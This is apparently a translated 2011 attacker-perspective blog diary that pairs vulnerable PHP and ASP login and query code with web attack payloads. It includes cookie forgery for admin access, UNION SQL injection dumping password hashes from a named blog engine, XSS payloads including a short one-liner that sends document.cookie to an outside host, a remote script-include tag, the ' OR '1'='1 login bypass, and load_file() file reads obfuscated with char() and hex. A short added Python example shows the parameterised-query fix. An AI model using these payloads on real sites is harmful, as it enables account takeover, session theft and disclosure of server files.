// Friday, 2011-11-11
// PHP programmer's thinking:
// login.php --- code snippet
if ($adminuser == $user and $adminpass == $pass)
{
    // the whole login state lives in a client-controlled cookie
    setcookie("login", "yes", time() + 3600);
    header("Location: admin.php");
}
// Our thinking:
javascript:alert(document.cookie = "login=" + escape("yes"))
############################################################
// ASP programmer's thinking:
// Code snippet
<%
If Request.Cookies("xxx")("user") = "" Or Request.Cookies("xxx")("admin_pass") = "" Or Request.Cookies("xxx")("admin_class") = "" Then
    Response.Cookies("xxx")("user") = ""
    Response.Cookies("xxx")("pass") = ""
    Response.Cookies("xxx")("admin_class") = ""
    Response.Redirect "ad_login.asp"
    Response.End
End If
%>
// Code snippet --- identification
<% If rs("admin_class") = 0 Then Response.Write "selected" %> admin
<% If rs("admin_class") = 1 Then Response.Write "selected" %> user
<% If rs("admin_class") = 2 Then Response.Write "selected" %> guest
// Our thinking:
admin_class = 0
Conclusion: quick and convenient usually means walking straight down the road to ruin.
PHP example, extended. Here I borrow an example from an expert:
// Code snippet
if ($go) @list($job, $itemid) = @explode('_', basename($go));
// Omitted
The original injection statement is
index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
// Omitted
Once the injection succeeds there is no need to crack the MD5 password at all.
Just set the cookies directly:
setcookie('userid', '1');
setcookie('userpsw', 'md5 ciphertext');
// Saturday, 2011-11-12
// Programmer's thinking:
// index.php --- code snippet
<?php
$micropoor = $_GET['micropoor'];
print $micropoor;   // echoed back with no output encoding
?>
// Our thinking:
index.php?micropoor=<script>alert(document.cookie)</script>
############################################################
// Programmer's thinking:
// index.php --- code snippet
<html>
<body>
<!-- ... -->
<input name="micropoor" value="<?php echo $_GET['micropoor']; ?>">
<!-- ... -->
</body>
</html>
// Our thinking:
http://127.0.0.1:81/index.php?micropoor="><script>alert(document.cookie);</script>
############################################################
// Programmer's thinking:
If the programmer filters out the <script></script> tags, this JS code will not execute on the page.
// Our thinking:
The src attribute of an <img> tag normally points to an image URL on a web server.
But it can also be replaced with:
Others: hexadecimal encoding, mixed characters, encryption, etc.
############################################################
// Breaking the length limit:
The following 28-byte command sends your cookie to the server with the host name micropoor.
open("//micropoor/"+document.cookie)
If HTML can be injected directly:
the following 30-byte tag loads and executes a script from the server with the host name micropoor.
<script src=http://micropoor></script>
Knowledge extension:
1. Use the JS script directly.
2. Encode the JS script.
3. Use a tag's trigger condition to insert the code, then encode it.
4. Write it in hexadecimal notation.
Two types:
Stored XSS
Reflected XSS
That is as far as it goes here; the topic is not explored further.
Conclusion: all input is harmful.
// Sunday, 2011-11-13
// Programmer's thinking:
// micropoor.php --- code snippet
<?php
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '" . $id . "'";   // $id spliced straight into the SQL text
// Omitted
?>
// Our thinking:
index.php?id=1+UNION+SELECT+1,@@version+from+users--
// Programmer's thinking:
// micropoor.php --- code snippet
<?php
$user = $_POST['user'];
$pass = $_POST['pass'];
$link = mysql_connect('localhost', 'root', 'pass') or die('error: ' . mysql_error());
mysql_select_db("SQL_inj", $link);
// user and pass are concatenated into the statement with no escaping or parameter binding
$query = mysql_query("SELECT * FROM SQL_inj WHERE user = '" . $user . "' AND pass = '" . $pass . "'", $link);
if (mysql_num_rows($query) == 0) {
    echo "<script type=\"text/javascript\">location.href='micropoor.html';</script>";
    exit;
}
$logged = 1;
?>
// Our thinking:
$user = 1' OR '1'='1
$pass = 1' OR '1'='1
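As an added example (not the author's code), the login query above is run both the way the snippet builds it, by string concatenation, and in its hardened form with parameter binding, against a constructed in-memory SQLite stand-in for the SQL_inj table; the table contents and the use of SQLite are assumptions.

```python
import sqlite3

# Constructed stand-in for the page's SQL_inj table (assumption: one user row,
# plaintext password column, exactly what the snippet's query expects).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE SQL_inj (user TEXT, pass TEXT)")
    db.execute("INSERT INTO SQL_inj VALUES ('admin', 'secret')")
    return db

def build_concat_query(user, password):
    """The snippet's query, built the way the snippet builds it."""
    return ("SELECT * FROM SQL_inj WHERE user = '" + user
            + "' AND pass = '" + password + "'")

def login_concat(db, user, password):
    """Vulnerable: the input becomes part of the SQL text, so a quote in it
    changes the statement's structure. Mirrors mysql_num_rows($query) == 0."""
    rows = db.execute(build_concat_query(user, password)).fetchall()
    return len(rows) > 0

def login_param(db, user, password):
    """Hardened: placeholders keep the statement fixed; the driver passes the
    values separately, so quotes inside them are just characters."""
    rows = db.execute(
        "SELECT * FROM SQL_inj WHERE user = ? AND pass = ?",
        (user, password),
    ).fetchall()
    return len(rows) > 0

if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1"          # the page's bypass value for both fields
    print(build_concat_query(payload, payload))
    print("concat:", login_concat(db, payload, payload))   # True
    print("param: ", login_param(db, payload, payload))    # False
```

Parameter binding fixes only the injection; the snippet's plaintext password comparison is kept so the example stays on that one point.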
Also worth noting: MySQL built-in functions such as DATABASE(), USER(), SYSTEM_USER(), SESSION_USER() and CURRENT_USER() are often used inside SQL statements to obtain the information you want. Oh, by the way,
there is also load_file().
// Programmer's thinking:
// micropoor.php --- code snippet
// Note: current conditions: magic_quotes_gpc = off, root
SELECT * FROM article WHERE articleid = $id
// Our thinking:
-1 union select 1,1,load_file('C:/boot.ini')
// Which becomes:
SELECT * FROM article WHERE articleid = -1 union select 1,1,load_file('C:/boot.ini')
// Our thinking, rewritten with the char() function (no quotes needed):
-1 union select 1,1,load_file(char(67,58,47,98,111,111,116,46,105,110,105))
// Transformed once more, in hexadecimal:
SELECT * FROM article WHERE articleid = -1 union select 1,1,load_file(0x633a2f626f6f742e696e69)
Conclusion: if you will not let me through the door, I will go over the wall.
From http://hi.baidu.com/micropoor